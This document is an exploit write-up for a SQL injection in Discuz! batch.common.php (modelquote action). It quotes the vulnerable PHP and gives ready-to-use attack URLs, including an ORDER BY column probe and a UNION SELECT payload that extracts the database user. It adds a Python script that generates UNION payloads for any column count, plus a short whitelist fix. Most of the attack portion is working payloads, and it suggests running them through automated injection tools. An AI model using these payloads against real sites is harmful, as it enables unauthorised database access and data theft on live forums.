Discuz! multi-version SQL injection vulnerability in one of its products
I tried 6.x and 7.x and did not test other versions; it should also work there.
batch.common.php (218):

    } elseif ($action == 'modelquote') { // quote a model comment
        $name = empty($_GET['name']) ? '' : trim($_GET['name']); // no filtering
        $cid = empty($_GET['cid']) ? 0 : intval($_GET['cid']);
        $html = false;
        if (!empty($name) && !empty($cid)) {
            $item = array();
            // $name goes through tname() and straight into the query
            $query = $_SGLOBAL['db']->query('SELECT * FROM '.tname($name.'comments').' WHERE cid=\''.$cid.'\'');
            if ($item = $_SGLOBAL['db']->fetch_array($query)) {
                $item['message'] = preg_replace("/<blockquote.+?<\/blockquote>/is", '', $item['message']);
                $html = '[quote]'.$blang['from_the_original_note'].$item['author'].$blang['at'].sgmdate($item['dateline']).$blang['released']."\n".cuthtml($item['message'], 100).'[/quote]';
                showxml($html);
            }
        }
        showxml($html);
    }
Let's look at the tname function:
function/common.func.php (601):

    function tname($name, $mode=0) {
        global $_SC;
        if($mode == 1) {
            return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`';
        } elseif ($mode == 2) {
            return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`';
        } else {
            return $_SC['tablepre'].$name;
        }
    }
Still no filtering: in the default mode 0 used here, tname() only prepends $_SC['tablepre'] and returns the name without backticks, so the raw name= value lands directly in the FROM clause. You can start injecting.
Exp:

http://xxx/batch.common.php?action=modelquote&cid=1&name=spacecomments[SQL]#

The trailing # is needed because the code appends the literal string 'comments' to name and then adds WHERE cid='...'; the comment swallows both. When sending it, encode it as %23, otherwise the browser treats it as a URL fragment and never transmits it.
An ORDER BY can be appended directly:

http://xxx/batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx #
The number of fields differs between versions, so use ORDER BY to determine the column count first. For example, 7.5 has 21 fields, so the 7.5 exp below can be dropped in directly (where 1=2 removes the real rows so the first row fetched is the UNION row, and the 0x7e delimiters around user() make the result easy to spot in the returned XML):

http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C7996474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
Of course, you can also drop the URL into a tool and let it run the job. safe3 does not handle this one well; test it with a different tool.
Solution:

Filter $name before it reaches tname(): check it against the set of model names the code actually supports and reject anything else, instead of concatenating the raw parameter into the table name.
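The following is an added example, not code from the original post or from Discuz!. It models in Python how batch.common.php assembles the modelquote query, so you can see the exact SQL each payload above produces (the ORDER BY probe, the 7.5 UNION exp generalised to any column count, and why the # is required), and it shows the whitelist check described in the solution. The table prefix uchome_, the allowed model names and all helper names are assumptions made for the demo.

```python
# Added example, not code from the original post or from Discuz!: a Python model
# of how batch.common.php assembles the modelquote query, so the SQL that each
# payload in the write-up produces can be inspected, plus the whitelist check
# that closes the hole. The table prefix, the allowed model names and the
# helper names are assumptions made for this demo.
from urllib.parse import parse_qs, urlsplit

TABLE_PREFIX = "uchome_"  # assumed value of $_SC['tablepre']


def tname(name, mode=0):
    """Model of tname() in its default mode 0: the prefix is prepended and the
    result is returned unquoted, exactly as the PHP does."""
    if mode != 0:
        raise NotImplementedError("modes 1 and 2 (backtick-quoted) are not modelled")
    return TABLE_PREFIX + name


def build_modelquote_query(name, cid):
    """Vulnerable construction mirroring the PHP: 'comments' is appended to the
    unfiltered name and the result is concatenated into the FROM clause."""
    return "SELECT * FROM " + tname(name + "comments") + " WHERE cid='" + str(cid) + "'"


def query_from_url(url):
    """Replay the handler's parameter handling against an exploit URL:
    trim() on name (no filtering) and intval() on cid (simplified to int())."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    name = qs.get("name", [""])[0].strip()
    try:
        cid = int(qs.get("cid", ["0"])[0])
    except ValueError:
        cid = 0
    return build_modelquote_query(name, cid)


def effective_sql(sql):
    """The statement MySQL actually runs once a '#' comment is honoured: text
    from the first '#' to end of line is dropped, which removes both the
    'comments' suffix the code appended and the WHERE cid=... clause.
    (Simplified: a '#' inside a string literal would not start a comment.)"""
    return sql.split("#", 1)[0].rstrip()


def union_payload(ncols, marker_col=6):
    """Generalisation of the 7.5 exp: build the name= value for a table with
    ncols columns, placing concat(0x7e,user(),0x7e) in column marker_col.
    The post's payload is ncols=21, marker_col=6; other versions need the
    count found with ORDER BY first."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[marker_col - 1] = "concat(0x7e,user(),0x7e)"
    return "spacecomments where 1=2 union select " + ",".join(cols) + "#"


# Hardened version: name is checked against a whitelist of the model names the
# application actually has tables for (the set below is an assumption) before
# it is ever passed to tname(); anything else is rejected.
ALLOWED_MODELS = {"space", "blog"}


def build_modelquote_query_safe(name, cid):
    if name not in ALLOWED_MODELS:
        raise ValueError("rejected name parameter: %r" % name)
    return build_modelquote_query(name, int(cid))


if __name__ == "__main__":
    order_by = ("http://xxx/batch.common.php?action=modelquote&cid=1"
                "&name=spacecomments%20order%20by%2021%20%23")
    raw = query_from_url(order_by)
    print(raw)                 # the string PHP hands to the database
    print(effective_sql(raw))  # what MySQL runs after the comment
    print(effective_sql(build_modelquote_query(union_payload(21), 1)))
```

Running it prints the raw statement with the dangling "#comments WHERE cid='1'" tail, then the statement MySQL really executes, which is why the # must reach the server as %23: without it the appended 'comments' turns the table name into uchome_spacecomments order by 21comments and the query simply errors. The whitelist check is the PHP-side fix in miniature: the parameter never becomes part of an identifier unless it is one of the names the code already knows about.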